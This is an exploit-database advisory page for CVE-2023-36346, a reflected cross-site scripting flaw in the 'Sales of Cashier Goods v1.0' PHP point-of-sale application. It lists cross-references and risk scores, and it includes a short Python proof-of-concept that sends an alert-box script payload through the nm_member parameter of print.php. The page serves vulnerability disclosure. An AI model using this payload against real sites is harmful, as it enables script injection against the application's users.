Sales Of Cashier Goods 1.0 Cross Site Scripting

🗓️ 03 Jul 2023 00:00:00Reported by Amirhossein BahramizadehType

packetstorm🔗 packetstormsecurity.com👁 160 Views

Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS) exploi

Reporter	Title	Published	Views	Family All 13
0day.today	Sales of Cashier Goods v1.0 - Cross Site Scripting Exploit	4 Jul 202300:00	–	zdt
ATTACKERKB	CVE-2023-36346	23 Jun 202320:15	–	attackerkb
CNNVD	POS Codekop 跨站脚本漏洞	23 Jun 202300:00	–	cnnvd
CVE	CVE-2023-36346	23 Jun 202300:00	–	cve
Cvelist	CVE-2023-36346	23 Jun 202300:00	–	cvelist
Exploit DB	Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)	3 Jul 202300:00	–	exploitdb
EUVD	EUVD-2023-40314	23 Jun 202300:00	–	euvd
Nuclei	POS Codekop v2.0 - Cross Site Scripting	6 Jun 202603:01	–	nuclei
NVD	CVE-2023-36346	23 Jun 202320:15	–	nvd
Prion	Cross site scripting	23 Jun 202320:15	–	prion

`# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)  
# Date: 2023-06-23  
# country: Iran  
# Exploit Author: Amirhossein Bahramizadeh  
# Category : webapps  
# Dork : /print.php?nm_member=  
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html  
# Tested on: Windows/Linux  
# CVE : CVE-2023-36346  
  
import requests  
import urllib.parse  
  
# Set the target URL and payload  
url = "http://example.com/print.php"  
payload = "<script>alert('XSS')</script>"  
  
# Encode the payload for URL inclusion  
payload = urllib.parse.quote(payload)  
  
# Build the request parameters  
params = {  
"nm_member": payload  
}  
  
# Send the request and print the response  
response = requests.get(url, params=params)  
print(response.text)  
  
  
`

03 Jul 2023 00:00Current

7.1High risk

Vulners AI Score7.1

EPSS0.09444